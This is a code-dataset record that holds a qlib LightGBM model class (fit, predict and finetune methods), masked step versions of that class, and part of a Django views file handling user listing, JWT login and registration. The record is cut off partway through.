if reweighter is None:
w = None
elif isinstance(reweighter, Reweighter):
w = reweighter.reweight(df)
else:
raise ValueError("Unsupported reweighter type.")
ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))
return ds_l
def fit(
self,
dataset: DatasetH,
num_boost_round=None,
early_stopping_rounds=None,
verbose_eval=20,
evals_result=None,
reweighter=None,
**kwargs,
):
if evals_result is None:
evals_result = {} # in case of unsafety of Python default values
ds_l = self._prepare_data(dataset, reweighter)
ds, names = list(zip(*ds_l))
early_stopping_callback = lgb.early_stopping(
self.early_stopping_rounds if early_stopping_rounds is None else early_stopping_rounds
)
# NOTE: if you encounter error here. Please upgrade your lightgbm
verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)
evals_result_callback = lgb.record_evaluation(evals_result)
self.model = lgb.train(
self.params,
ds[0], # training dataset
num_boost_round=self.num_boost_round if num_boost_round is None else num_boost_round,
valid_sets=ds,
valid_names=names,
callbacks=[early_stopping_callback, verbose_eval_callback, evals_result_callback],
**kwargs,
)
for k in names:
for key, val in evals_result[k].items():
name = f"{key}.{k}"
for epoch, m in enumerate(val):
R.log_metrics(**{name.replace("@", "_"): m}, step=epoch)
def predict(self, dataset: DatasetH, segment: Union[Text, slice] = "test"):
if self.model is None:
raise ValueError("model is not fitted yet!")
x_test = dataset.prepare(segment, col_set="feature", data_key=DataHandlerLP.DK_I)
return pd.Series(self.model.predict(x_test.values), index=x_test.index)
def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=20, reweighter=None):
"""
finetune model
Parameters
----------
dataset : DatasetH
dataset for finetuning
num_boost_round : int
number of round to finetune model
verbose_eval : int
verbose level
"""
# Based on existing model and finetune by train more rounds
dtrain, _ = self._prepare_data(dataset, reweighter) # pylint: disable=W0632
if dtrain.empty:
raise ValueError("Empty data from dataset, please check your dataset config.")
verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)
self.model = lgb.train(
self.params,
dtrain,
num_boost_round=num_boost_round,
init_model=self.model,
valid_sets=[dtrain],
valid_names=["train"],
callbacks=[verbose_eval_callback],
)
|
normal
|
{
"blob_id": "d37187f067ddff94015e639a1759dddced817945",
"index": 6205,
"step-1": "<mask token>\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n <mask token>\n\n def __init__(self, loss='mse', early_stopping_rounds=50,\n num_boost_round=1000, **kwargs):\n if loss not in {'mse', 'binary'}:\n raise NotImplementedError\n self.params = {'objective': loss, 'verbosity': -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) ->List[Tuple\n [lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert 'train' in dataset.segments\n for key in ['train', 'valid']:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=['feature', 'label'],\n data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.'\n )\n x, y = df['feature'], df['label']\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\n \"LightGBM doesn't support multi-label training\")\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError('Unsupported reweighter type.')\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(self, dataset: DatasetH, num_boost_round=None,\n early_stopping_rounds=None, verbose_eval=20, evals_result=None,\n reweighter=None, **kwargs):\n if evals_result is None:\n evals_result = {}\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(self.\n early_stopping_rounds if early_stopping_rounds is None else\n early_stopping_rounds)\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(self.params, ds[0], num_boost_round=self.\n num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds, valid_names=names, callbacks=[\n early_stopping_callback, verbose_eval_callback,\n evals_result_callback], **kwargs)\n for k in names:\n for key, val in evals_result[k].items():\n name = f'{key}.{k}'\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace('@', '_'): m}, step=epoch)\n <mask token>\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=\n 20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n dtrain, _ = self._prepare_data(dataset, reweighter)\n if dtrain.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.')\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(self.params, dtrain, num_boost_round=\n num_boost_round, init_model=self.model, valid_sets=[dtrain],\n valid_names=['train'], callbacks=[verbose_eval_callback])\n",
"step-2": "<mask token>\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n <mask token>\n\n def __init__(self, loss='mse', early_stopping_rounds=50,\n num_boost_round=1000, **kwargs):\n if loss not in {'mse', 'binary'}:\n raise NotImplementedError\n self.params = {'objective': loss, 'verbosity': -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) ->List[Tuple\n [lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert 'train' in dataset.segments\n for key in ['train', 'valid']:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=['feature', 'label'],\n data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.'\n )\n x, y = df['feature'], df['label']\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\n \"LightGBM doesn't support multi-label training\")\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError('Unsupported reweighter type.')\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(self, dataset: DatasetH, num_boost_round=None,\n early_stopping_rounds=None, verbose_eval=20, evals_result=None,\n reweighter=None, **kwargs):\n if evals_result is None:\n evals_result = {}\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(self.\n early_stopping_rounds if early_stopping_rounds is None else\n early_stopping_rounds)\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(self.params, ds[0], num_boost_round=self.\n num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds, valid_names=names, callbacks=[\n early_stopping_callback, verbose_eval_callback,\n evals_result_callback], **kwargs)\n for k in names:\n for key, val in evals_result[k].items():\n name = f'{key}.{k}'\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace('@', '_'): m}, step=epoch)\n\n def predict(self, dataset: DatasetH, segment: Union[Text, slice]='test'):\n if self.model is None:\n raise ValueError('model is not fitted yet!')\n x_test = dataset.prepare(segment, col_set='feature', data_key=\n DataHandlerLP.DK_I)\n return pd.Series(self.model.predict(x_test.values), index=x_test.index)\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=\n 20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n dtrain, _ = self._prepare_data(dataset, reweighter)\n if dtrain.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.')\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(self.params, dtrain, num_boost_round=\n num_boost_round, init_model=self.model, valid_sets=[dtrain],\n valid_names=['train'], callbacks=[verbose_eval_callback])\n",
"step-3": "<mask token>\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n \"\"\"LightGBM Model\"\"\"\n\n def __init__(self, loss='mse', early_stopping_rounds=50,\n num_boost_round=1000, **kwargs):\n if loss not in {'mse', 'binary'}:\n raise NotImplementedError\n self.params = {'objective': loss, 'verbosity': -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) ->List[Tuple\n [lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert 'train' in dataset.segments\n for key in ['train', 'valid']:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=['feature', 'label'],\n data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.'\n )\n x, y = df['feature'], df['label']\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\n \"LightGBM doesn't support multi-label training\")\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError('Unsupported reweighter type.')\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(self, dataset: DatasetH, num_boost_round=None,\n early_stopping_rounds=None, verbose_eval=20, evals_result=None,\n reweighter=None, **kwargs):\n if evals_result is None:\n evals_result = {}\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(self.\n early_stopping_rounds if early_stopping_rounds is None else\n early_stopping_rounds)\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(self.params, ds[0], num_boost_round=self.\n num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds, valid_names=names, callbacks=[\n early_stopping_callback, verbose_eval_callback,\n evals_result_callback], **kwargs)\n for k in names:\n for key, val in evals_result[k].items():\n name = f'{key}.{k}'\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace('@', '_'): m}, step=epoch)\n\n def predict(self, dataset: DatasetH, segment: Union[Text, slice]='test'):\n if self.model is None:\n raise ValueError('model is not fitted yet!')\n x_test = dataset.prepare(segment, col_set='feature', data_key=\n DataHandlerLP.DK_I)\n return pd.Series(self.model.predict(x_test.values), index=x_test.index)\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=\n 20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n dtrain, _ = self._prepare_data(dataset, reweighter)\n if dtrain.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.')\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(self.params, dtrain, num_boost_round=\n num_boost_round, init_model=self.model, valid_sets=[dtrain],\n valid_names=['train'], callbacks=[verbose_eval_callback])\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom typing import List, Text, Tuple, Union\nfrom ...model.base import ModelFT\nfrom ...data.dataset import DatasetH\nfrom ...data.dataset.handler import DataHandlerLP\nfrom ...model.interpret.base import LightGBMFInt\nfrom ...data.dataset.weight import Reweighter\nfrom qlib.workflow import R\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n \"\"\"LightGBM Model\"\"\"\n\n def __init__(self, loss='mse', early_stopping_rounds=50,\n num_boost_round=1000, **kwargs):\n if loss not in {'mse', 'binary'}:\n raise NotImplementedError\n self.params = {'objective': loss, 'verbosity': -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) ->List[Tuple\n [lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert 'train' in dataset.segments\n for key in ['train', 'valid']:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=['feature', 'label'],\n data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.'\n )\n x, y = df['feature'], df['label']\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\n \"LightGBM doesn't support multi-label training\")\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError('Unsupported reweighter type.')\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(self, dataset: DatasetH, num_boost_round=None,\n early_stopping_rounds=None, verbose_eval=20, evals_result=None,\n reweighter=None, **kwargs):\n if evals_result is None:\n evals_result = {}\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(self.\n early_stopping_rounds if early_stopping_rounds is None else\n early_stopping_rounds)\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(self.params, ds[0], num_boost_round=self.\n num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds, valid_names=names, callbacks=[\n early_stopping_callback, verbose_eval_callback,\n evals_result_callback], **kwargs)\n for k in names:\n for key, val in evals_result[k].items():\n name = f'{key}.{k}'\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace('@', '_'): m}, step=epoch)\n\n def predict(self, dataset: DatasetH, segment: Union[Text, slice]='test'):\n if self.model is None:\n raise ValueError('model is not fitted yet!')\n x_test = dataset.prepare(segment, col_set='feature', data_key=\n DataHandlerLP.DK_I)\n return pd.Series(self.model.predict(x_test.values), index=x_test.index)\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=\n 20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n dtrain, _ = self._prepare_data(dataset, reweighter)\n if dtrain.empty:\n raise ValueError(\n 'Empty data from dataset, please check your dataset config.')\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(self.params, dtrain, num_boost_round=\n num_boost_round, init_model=self.model, valid_sets=[dtrain],\n valid_names=['train'], callbacks=[verbose_eval_callback])\n",
"step-5": "# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\nimport numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom typing import List, Text, Tuple, Union\nfrom ...model.base import ModelFT\nfrom ...data.dataset import DatasetH\nfrom ...data.dataset.handler import DataHandlerLP\nfrom ...model.interpret.base import LightGBMFInt\nfrom ...data.dataset.weight import Reweighter\nfrom qlib.workflow import R\n\n\nclass LGBModel(ModelFT, LightGBMFInt):\n \"\"\"LightGBM Model\"\"\"\n\n def __init__(self, loss=\"mse\", early_stopping_rounds=50, num_boost_round=1000, **kwargs):\n if loss not in {\"mse\", \"binary\"}:\n raise NotImplementedError\n self.params = {\"objective\": loss, \"verbosity\": -1}\n self.params.update(kwargs)\n self.early_stopping_rounds = early_stopping_rounds\n self.num_boost_round = num_boost_round\n self.model = None\n\n def _prepare_data(self, dataset: DatasetH, reweighter=None) -> List[Tuple[lgb.Dataset, str]]:\n \"\"\"\n The motivation of current version is to make validation optional\n - train segment is necessary;\n \"\"\"\n ds_l = []\n assert \"train\" in dataset.segments\n for key in [\"train\", \"valid\"]:\n if key in dataset.segments:\n df = dataset.prepare(key, col_set=[\"feature\", \"label\"], data_key=DataHandlerLP.DK_L)\n if df.empty:\n raise ValueError(\"Empty data from dataset, please check your dataset config.\")\n x, y = df[\"feature\"], df[\"label\"]\n\n # Lightgbm need 1D array as its label\n if y.values.ndim == 2 and y.values.shape[1] == 1:\n y = np.squeeze(y.values)\n else:\n raise ValueError(\"LightGBM doesn't support multi-label training\")\n\n if reweighter is None:\n w = None\n elif isinstance(reweighter, Reweighter):\n w = reweighter.reweight(df)\n else:\n raise ValueError(\"Unsupported reweighter type.\")\n ds_l.append((lgb.Dataset(x.values, label=y, weight=w), key))\n return ds_l\n\n def fit(\n self,\n dataset: DatasetH,\n num_boost_round=None,\n early_stopping_rounds=None,\n verbose_eval=20,\n evals_result=None,\n reweighter=None,\n **kwargs,\n ):\n if evals_result is None:\n evals_result = {} # in case of unsafety of Python default values\n ds_l = self._prepare_data(dataset, reweighter)\n ds, names = list(zip(*ds_l))\n early_stopping_callback = lgb.early_stopping(\n self.early_stopping_rounds if early_stopping_rounds is None else early_stopping_rounds\n )\n # NOTE: if you encounter error here. Please upgrade your lightgbm\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n evals_result_callback = lgb.record_evaluation(evals_result)\n self.model = lgb.train(\n self.params,\n ds[0], # training dataset\n num_boost_round=self.num_boost_round if num_boost_round is None else num_boost_round,\n valid_sets=ds,\n valid_names=names,\n callbacks=[early_stopping_callback, verbose_eval_callback, evals_result_callback],\n **kwargs,\n )\n for k in names:\n for key, val in evals_result[k].items():\n name = f\"{key}.{k}\"\n for epoch, m in enumerate(val):\n R.log_metrics(**{name.replace(\"@\", \"_\"): m}, step=epoch)\n\n def predict(self, dataset: DatasetH, segment: Union[Text, slice] = \"test\"):\n if self.model is None:\n raise ValueError(\"model is not fitted yet!\")\n x_test = dataset.prepare(segment, col_set=\"feature\", data_key=DataHandlerLP.DK_I)\n return pd.Series(self.model.predict(x_test.values), index=x_test.index)\n\n def finetune(self, dataset: DatasetH, num_boost_round=10, verbose_eval=20, reweighter=None):\n \"\"\"\n finetune model\n\n Parameters\n ----------\n dataset : DatasetH\n dataset for finetuning\n num_boost_round : int\n number of round to finetune model\n verbose_eval : int\n verbose level\n \"\"\"\n # Based on existing model and finetune by train more rounds\n dtrain, _ = self._prepare_data(dataset, reweighter) # pylint: disable=W0632\n if dtrain.empty:\n raise ValueError(\"Empty data from dataset, please check your dataset config.\")\n verbose_eval_callback = lgb.log_evaluation(period=verbose_eval)\n self.model = lgb.train(\n self.params,\n dtrain,\n num_boost_round=num_boost_round,\n init_model=self.model,\n valid_sets=[dtrain],\n valid_names=[\"train\"],\n callbacks=[verbose_eval_callback],\n )\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import os
from datetime import datetime, timedelta
from django.shortcuts import render
from django.utils.decorators import method_decorator
from rest_framework.viewsets import GenericViewSet, mixins
from common.jwt_util import generate_jwt
from .serializers import ApiUser, ApiUserSerializer, UserSerializer
from common.myresponse import StatusResponse
from rest_framework.generics import GenericAPIView
from .models import User
from common.utils.login_util import login_decorator
# Create your views here.
@method_decorator(login_decorator,name="list")
class UsersOptionsView(GenericViewSet, mixins.ListModelMixin):
"""
list:
返回用户列表
"""
serializer_class = ApiUserSerializer
queryset = User.objects.filter(is_superuser=0,is_active=1).all()
def list(self, request, *args, **kwargs):
return StatusResponse(data=super().list(request).data)
class UserLoginView(GenericAPIView):
def _generate_tokens(self, user_id, with_refresh_token=True):
"""
生成token 和refresh_token
:param user_id: 用户id
:return: token, refresh_token
"""
# 颁发JWT
now = datetime.utcnow()
expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))
token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)
refresh_token = None
if with_refresh_token:
refresh_expiry = now + timedelta(days=float(os.environ['JWT_REFRESH_DAYS']))
refresh_token = generate_jwt({'user_id': user_id, 'refresh': True}, refresh_expiry)
return token, refresh_token
def post(self, request):
username = request.data.get("username")
password = request.data.get("password")
try:
user = User.objects.get(username=username)
except User.DoesNotExist as e:
return StatusResponse(http_code=400,data={"tip": "用户不存在"})
if user is not None and user.check_password(password):
token, refresh_token = self._generate_tokens(user.id, with_refresh_token=True)
data = {
"token": token,
"refresh_token": refresh_token,
"id": user.id,
"username": user.username
}
response = StatusResponse(data=data, http_code=201)
return response
return StatusResponse(http_code=400,data={"tip":"登录失败"})
def put(self,request):
if request.user_id and request.refresh:
token,refresh_token = self._generate_tokens(request.user_id, with_refresh_token=False)
data ={
"id":request.user_id,
"token":token
}
response = StatusResponse(data=data, http_code=201)
return response
else:
return StatusResponse(http_code=401, data={"tip": "token刷新失败"})
class UserRegistView(GenericAPIView):
serializer_class = UserSerializer
def post(self, request):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
return StatusResponse(http_code=200,data=serializer.data)
|
normal
|
{
"blob_id": "0457ac2ecd0a951b0088c887539ab696797d68bc",
"index": 4557,
"step-1": "<mask token>\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-2": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-3": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n <mask token>\n serializer_class = ApiUserSerializer\n queryset = User.objects.filter(is_superuser=0, is_active=1).all()\n\n def list(self, request, *args, **kwargs):\n return StatusResponse(data=super().list(request).data)\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-4": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n \"\"\"\n list:\n 返回用户列表\n \"\"\"\n serializer_class = ApiUserSerializer\n queryset = User.objects.filter(is_superuser=0, is_active=1).all()\n\n def list(self, request, *args, **kwargs):\n return StatusResponse(data=super().list(request).data)\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-5": "import os\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom django.shortcuts import render\r\nfrom django.utils.decorators import method_decorator\r\nfrom rest_framework.viewsets import GenericViewSet, mixins\r\n\r\nfrom common.jwt_util import generate_jwt\r\nfrom .serializers import ApiUser, ApiUserSerializer, UserSerializer\r\nfrom common.myresponse import StatusResponse\r\nfrom rest_framework.generics import GenericAPIView\r\nfrom .models import User\r\nfrom common.utils.login_util import login_decorator\r\n\r\n\r\n# Create your views here.\r\n\r\n@method_decorator(login_decorator,name=\"list\")\r\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\r\n \"\"\"\r\n list:\r\n 返回用户列表\r\n \"\"\"\r\n serializer_class = ApiUserSerializer\r\n queryset = User.objects.filter(is_superuser=0,is_active=1).all()\r\n\r\n def list(self, request, *args, **kwargs):\r\n return StatusResponse(data=super().list(request).data)\r\n\r\n\r\n\r\nclass UserLoginView(GenericAPIView):\r\n def _generate_tokens(self, user_id, with_refresh_token=True):\r\n \"\"\"\r\n 生成token 和refresh_token\r\n :param user_id: 用户id\r\n :return: token, refresh_token\r\n \"\"\"\r\n # 颁发JWT\r\n now = datetime.utcnow()\r\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\r\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\r\n\r\n refresh_token = 